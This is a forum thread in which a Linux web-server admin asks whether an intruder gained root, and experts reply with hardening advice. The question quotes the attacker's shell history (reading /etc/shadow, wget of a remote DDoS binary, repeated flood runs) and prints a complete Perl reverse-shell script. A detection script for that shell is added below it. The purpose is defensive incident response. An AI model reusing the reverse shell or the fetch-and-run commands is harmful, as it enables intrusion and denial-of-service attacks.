Question

Linux: Possible root vulnerability, through url code injection

Asked by: TSHAW

Hello, I've searched for my question and found something similar in the question with ID 21727726. But I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory; I also found in /root/.bash_history the following set of commands that I didn't enter in any terminal of my server:

ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128

Apparently the hacker accessed my server as root (since it is the only way he could possibly have run those commands in a superuser terminal) and ran that set of commands, including the download of the dd script. I'm sure he didn't get in by entering the correct password, because he didn't change it and I've already searched the logs for ssh failures. I'm attaching the screenshot of the dd script code. If you need it I can send it to you.

We first noticed the attack because our site just became unreachable, and even through the FW we couldn't reach the servers. When I first accessed the server (physically) I just saw the "dd" process running at 100% of the CPU, so I proceeded to kill it. After that the server returned to normal, and so did the FW.

So my question:
1.- Did he really access my server as root?
2.- If so, what do I have to do to protect it?


Thank you in advance

"back" code:
 
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

                                  

Attachment: DDOS.doc (125 KB) - Screen shot of the DDOS script.
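An added detection example for the "back" script above (my code, not part of the original question or of the attacker's script): because the script dups STDIN, STDOUT and STDERR onto its TCP socket, the running process shows fds 0, 1 and 2 all resolving to socket:[inode] under /proc. The function names and the /proc layout assumptions are mine; inspecting other users' processes requires root.

```python
"""Flag processes whose three standard streams are all sockets.

Added example, not code from the original post or the attacker's script.
"back" dups STDIN/STDOUT/STDERR onto its TCP socket, so /proc/<pid>/fd/0,
1 and 2 all resolve to "socket:[<inode>]"; an interactive shell has them
on a pty and a daemon on /dev/null, so the footprint is rare on a healthy host.
"""
import os
import re
from typing import Dict, List, Tuple

SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")  # readlink() result for a socket fd

def std_streams_are_sockets(fd_targets: Dict[int, str]) -> bool:
    """True only if fds 0, 1 and 2 are all present and all sockets."""
    return all(SOCKET_LINK.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))

def read_fd_targets(pid: int, proc_root: str = "/proc") -> Dict[int, str]:
    """Resolve every symlink under /proc/<pid>/fd; {} if the process is gone
    or unreadable (other users' processes need root)."""
    fd_dir = os.path.join(proc_root, str(pid), "fd")
    targets: Dict[int, str] = {}
    try:
        names = os.listdir(fd_dir)
    except OSError:
        return targets
    for name in names:
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue  # fd closed between listdir() and readlink()
    return targets

def describe(pid: int, proc_root: str = "/proc") -> str:
    """cmdline plus exe link: "back" sets $0 to "lynx" so the cmdline lies,
    but /proc/<pid>/exe still resolves to the perl interpreter."""
    base = os.path.join(proc_root, str(pid))
    try:
        with open(os.path.join(base, "cmdline"), "rb") as fh:
            cmd = fh.read().replace(b"\0", b" ").decode("utf-8", "replace").strip()
        exe = os.readlink(os.path.join(base, "exe"))
    except OSError:
        cmd, exe = "?", "?"
    return f"pid={pid} cmdline={cmd!r} exe={exe}"

def find_suspects(proc_root: str = "/proc") -> List[Tuple[int, str]]:
    """(pid, description) for every process whose fds 0, 1 and 2 are sockets."""
    hits: List[Tuple[int, str]] = []
    for name in os.listdir(proc_root):
        if name.isdigit() and std_streams_are_sockets(read_fd_targets(int(name), proc_root)):
            hits.append((int(name), describe(int(name), proc_root)))
    return hits
```

Run `find_suspects()` as root on the live host and cross-check each hit's socket inode against /proc/net/tcp to see where it is connected.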


Asked On: 2009-10-21 at 17:49:49 (ID 24832911)
Tags: root, vulnerability, code injection, perl
Topics: Linux Network Security, Web Servers, Networking Security Vulnerabilities
Participating Experts: 3
Points: 350
Comments: 9


Answers

 

by: ahoffmann, posted on 2009-10-22 at 06:12:13, ID: 25633706

do you probably have vulnerable web applications on that server?

 

by: fosiul01, posted on 2009-10-22 at 07:25:30, ID: 25634564

What's this server for?? Webserver??

First of all, I will tell you to remove this server from production, break it and then install a new OS again.

Cause: when someone entered the server (by any means) they might have opened some back door, so even if you delete those files, it will still be infected again.


"I'm sure he didn't get in by entering the correct password, because he didn't change it and I've already searched the logs for ssh failures"

That's true. They don't have to change the password!! They can put some hidden script and it will make an open door for him to come back any time!! And if a server is hacked, the /var/log/secure log is useless, because that's the place they will hack first, and they will delete any entry related to their hacking...

If you use a syslog server to remotely copy all the logs to another server then you could have noticed whether it has been accessed by someone or not. Other than that it's just useless.


1. Reinstall your server.
2. Put all the data back from backup, but make sure those backups were not tampered with by anyone.
3. Use a strong firewall to protect your server.
4. Use iptables and only allow certain traffic to your server.
5. Use portsentry (a free but really good piece of software) to secure your server from IDS.
6. Use fail2ban.
7. If this server is a webserver, don't allow direct traffic to this server; use a reverse proxy and then from the reverse proxy allow http connections to this server.
8. Use mod_security to protect your apache.
9. Make sure apache is not running as root user..


These are the basic things you can do if you don't want to pay for paid security software...





 

by: ahoffmann, posted on 2009-10-22 at 07:31:46, ID: 25634655

> 1. Reinstall your server.
FULL ACK
:)

<probably off-topic>

> 8. use mod security to protect your apache
hmm, mod_security can protect your application, but it can protect apache only partially
remember that mod_security is a module inside apache
</probably off-topic>

 

by: TSHAW, posted on 2009-10-22 at 09:19:48, ID: 25635940

1.- This server is a webserver (web application)
2.- This server is behind a Juniper Netscreen firewall; all the ports are protected, the only one that is open is 80 and it's redirected to the server through a VIP service
3.- The servers are not directly reachable via ssh, ftp or telnet from the internet. I have a VPN from my office to administer them, with local ip addresses.
4.- Apache is not running as root.

I think that it is difficult to access the server directly considering the above. So maybe the hacker really accessed my server through some vulnerability of the web application, isn't it?

 

by: ahoffmann, posted on 2009-10-23 at 00:07:32, ID: 25641885

if your server (httpd process) is not running as root, and the default server (that part which is served as user root) is not accessible, then there are only 2 possibilities left:
  1. the web server (apache httpd here) itself has a vulnerability
  2. any of the applications uses/calls an external program which can get root access

Do you have any hints in your access_log or error_log?

 

by: fosiul01, posted on 2009-10-23 at 00:40:53, ID: 25642017

In the scenario you are describing, it looks like it was done via the web server...

What kind of website is your server holding?? Does any website need to play with the Linux file system or something like that??
What I mean is, does any website have any ability to modify the Linux file system for any kind of purpose.. or anything..


Is your Apache up to date?? Is your Linux server up to date??

 

by: TSHAW, posted on 2009-10-23 at 08:39:16, ID: 25645470

ahoffmann:

1.- The apache child processes are running as nobody, but indeed the default server is running as root. So what do I have to do to be sure this default server (running as root) is not accessible?
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.

fosiul01:

1.- My web site is an AVL (automatic vehicle location) developed in php. As far as I can remember there isn't any part of the website that accesses the Linux file system. I do have some php scripts that run from the cli, but those scripts are not accessible from the web (these php scripts do play with the Linux file system).
2.- We are updating apache and linux right now (to tell you the truth we didn't update them for a while).

note: We just decided to run apache on a higher port (1030) so the FW does the translation from 80 to 1030, and to use a user called "webserver" to run apache. What do you think?

 

by: fosiul01, posted on 2009-10-23 at 09:03:27, ID: 25645731

Update both Apache and Linux (but reinstall first). Don't update the same server. Reinstall totally, then install again.

Put a firewall in place.. install mod_security. Nowadays, most companies are using mod_security as an apache-level firewall.

Also use the reverse proxy concept; it will save your main server from 90% of hacks....

Also, since you have been hacked once!! Keep all your logs on a different server which can't be accessed from outside. If any incident happens you will know how it happened.

As I said, the first thing hackers do is delete all the offensive logs from the compromised server.

 

by: legolasthehansy, posted on 2009-10-27 at 00:22:04, ID: 25669764

I feel sorry for TSHAW and this certainly seems to be a hard lesson..
Adding to the experts here,
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use WebInspect or Nikto, there are lots out there).
Once done, along with the experts' suggestions - deploy. A syslog server would also help so that your webserver can direct its logs to it.
